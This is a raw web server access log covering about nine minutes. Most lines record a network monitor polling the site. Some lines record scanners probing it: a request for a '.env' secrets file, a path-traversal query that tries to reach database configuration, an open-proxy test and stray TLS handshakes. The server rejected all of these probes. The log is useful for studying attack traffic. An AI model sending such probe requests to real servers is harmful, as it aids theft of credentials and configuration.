212.91.247.32 - - [03/Jul/2025:22:54:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:56:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:57:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:22:58:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
196.251.117.9 - - [03/Jul/2025:22:58:03 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 8.1.0; SM-T580) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36"
185.218.84.46 - - [03/Jul/2025:22:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:22:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.166.239.145 - - [03/Jul/2025:22:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:22:59:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [03/Jul/2025:23:00:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:23:00:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:23:01:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.254.6.114 - - [03/Jul/2025:23:02:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.254.6.114 - - [03/Jul/2025:23:02:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.254.6.114 - - [03/Jul/2025:23:02:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.84.149 - - [03/Jul/2025:23:02:27 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
212.91.247.32 - - [03/Jul/2025:23:02:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.36.37.85 - - [03/Jul/2025:23:02:52 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
46.36.37.85 - - [03/Jul/2025:23:02:53 +0200] "GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1" 404 324 "-" "Go-http-client/1.1"
185.218.84.47 - - [03/Jul/2025:23:03:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.168.235 - - [03/Jul/2025:23:03:30 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
